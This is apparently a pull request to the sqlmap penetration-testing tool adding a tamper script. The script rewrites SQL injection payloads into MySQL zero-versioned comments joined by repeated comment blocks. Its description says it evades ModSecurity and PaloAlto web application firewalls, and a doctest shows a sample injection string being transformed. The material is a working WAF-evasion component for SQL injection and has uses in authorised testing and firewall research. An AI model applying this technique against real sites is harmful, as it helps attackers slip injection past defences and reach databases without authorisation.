### PR TITLE
Multi space + modsec zero-versioned

### DIFF
--- a/tamper/multifixspaceplusmodsec.py
+++ b/tamper/multifixspaceplusmodsec.py
@@ -1,0 +1,39 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
+"""
+
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.NORMAL
+
+def dependencies():
+    pass
+
+def tamper(payload, **kwargs):
+    """
+    Embraces ModSecurity zero-versioned bypass and multiple space to comment bypass in one
+
+    Requirements:
+        * MySQL >= 5.0
+
+    Tested against:
+        * MySQL <= 5.0
+        * MySQL >= 5.0
+
+    Notes:
+        * Can be used to bypass PaloAlto and ModSecurity WAF/IPS
+
+    >>> tamper("1) AND 6362=9217 AND (7458=7458")
+    /*!000001)*//**//**//**//*!00000AND*//**//**//**//*!000006362=9217*//**//**//**//*!00000AND*//**//**//**//*!00000(7458=7458*/
+    """
+    if payload:
+        retVal = []
+        amountToReplace = 3
+
+        for data in payload.split(" "):
+            retVal.append("/*!00000%s*/" % data)
+
+        return '%s' % ('/**/' * amountToReplace).join(retVal)


### PR DESCRIPTION
What this script does:

> This script will encode the payload into multiple fixed spaces (3 spaces) plus modsec zero-versioned (!00000payload). 

Example:

```
>>> tamper("1) AND 6362=9217 AND (7458=7458")
/*!000001)*//**//**//**//*!00000AND*//**//**//**//*!000006362=9217*//**//**//**//*!00000AND*//**//**//**//*!00000(7458=7458*/
```

Notes:

  - This script _may_ only be useful in special cases (if you want that added as a dependency please say so) but it is able to bypass modsec and paloalto WAF. 
  - This script was tested against `MySQL >= 5.0` & `MySQL <= 5.0`
  - This script embraces a set number of multiple spaces (`3`) and encodes the entire payload from the beginning to the end. It will zero-version the keywords and add space to comment between each keyword.

Why is this useful?
  - This script gets a set number of spaces instead of a random number like the current `space2comment`
  - This script uses two different obfuscations in one
  - Sometimes when attempting to inject you will receive a `503` from PaloAlto, this script is able to prevent that issue

